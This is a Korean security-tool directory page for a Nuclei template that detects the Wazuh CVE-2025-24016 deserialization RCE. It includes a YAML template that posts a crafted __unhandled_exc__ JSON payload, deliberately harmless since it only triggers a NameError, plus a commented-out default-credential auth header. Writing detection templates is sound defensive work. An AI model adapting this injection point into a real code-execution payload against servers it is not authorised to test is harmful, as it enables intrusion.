Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-24016-Nuclei-Template — CVE-2025-24016 안전하지 않은 역직렬화 RCE를 Wazuh 서버에서 NameError를 트리거하는 조작된 JSON 페이로드를 통해 탐지하는 Nuclei 템플릿 | Kitploit
도구/GitHubGitHub/huseyinstif/cve-2025-24016-nuclei-template
Vulnerability ScannersCode AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHubhuseyinstif/cve-2025-24016-nuclei-template

CVE-2025-24016-Nuclei-Template

CVE-2025-24016 안전하지 않은 역직렬화 RCE를 Wazuh 서버에서 NameError를 트리거하는 조작된 JSON 페이로드를 통해 탐지하는 Nuclei 템플릿

저장소 보기
4131년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-24016 Wazuh 안전하지 않은 역직렬화 RCE 탐지

이 저장소는 CVE-2025-24016으로 식별된 Wazuh 서버의 안전하지 않은 역직렬화 취약점을 탐지하는 Nuclei 템플릿을 포함합니다.

템플릿 세부 사항

root@kitploit:~
id: wazuh-unsafe-deserialization
info:
  name: "Wazuh Unsafe Deserialization RCE Detection"
  author: "Hüseyin TINTAŞ"
  severity: critical
  description: |
    This template detects an unsafe deserialization vulnerability in Wazuh servers.
    The DistributedAPI deserializes JSON data using as_wazuh_object. If an attacker injects
    a malicious object (via __unhandled_exc__), arbitrary Python code execution can be achieved.
    Instead of triggering a shutdown (e.g. via exit), this template uses a non-existent class 
    ("NotARealClass") to generate a NameError. A NameError in the response indicates that the 
    payload reached the vulnerable deserialization function.
  tags: wazuh, deserialization, rce, unsafe, cve, cve-2025-24016
  reference:
    - https://documentation.wazuh.com/
requests:
  - method: POST
    path:
      - "{{BaseURL}}/security/user/authenticate/run_as"
    headers:
      Content-Type: application/json
      # If needed, uncomment the following line for authentication (Base64 encoded "wazuh-wui:MyS3cr37P450r.*-")
      # Authorization: "Basic d2F6dXcta3dpTUltUzNjcjM3UDA1MHItOg=="
    body: '{"__unhandled_exc__":{"__class__": "NotARealClass", "__args__": []}}'
    matchers:
      - type: status
        status:
          - 500
      - type: word
        part: body
        words:
          - "NameError"

사용법

root@kitploit:~
nuclei -t CVE-2025-24016.yaml -u http://example.com

연락처

문의 사항이나 추가 정보가 있으시면 다음 채널을 통해 연락 주세요:

  • LinkedIn
  • Twitter
도구 다운로드